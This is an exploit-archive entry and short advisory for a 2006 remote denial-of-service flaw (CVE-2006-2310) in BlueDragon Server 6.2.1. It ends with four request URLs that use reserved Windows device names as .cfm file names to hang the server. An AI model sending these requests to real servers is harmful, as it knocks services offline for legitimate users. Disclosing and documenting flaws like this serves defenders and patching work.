[] NeoSense

BlueDragon Server 6.2.1 - '.cfm' Denial of Service

Author: Tan Chew Keong
type: dos
platform: cfm
port: 
date_added: 2006-06-23 
date_updated: 2013-09-05 
verified: 1 
codes: CVE-2006-2310;OSVDB-26788 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/18624/info

BlueDragon is prone to a remote denial-of-service vulnerability. This issue is due to the application's failure to efficiently handle malformed GET requests.

An attacker can exploit this issue to cause the service to stop responding, effectively denying service to legitimate users.

This issue affects version 6.2.1.286; other versions may also be vulnerable.

http://www.example.com/con.cfm
http://www.example.com/aux.cfm
http://www.example.com/com1.cfm
http://www.example.com/com2.cfm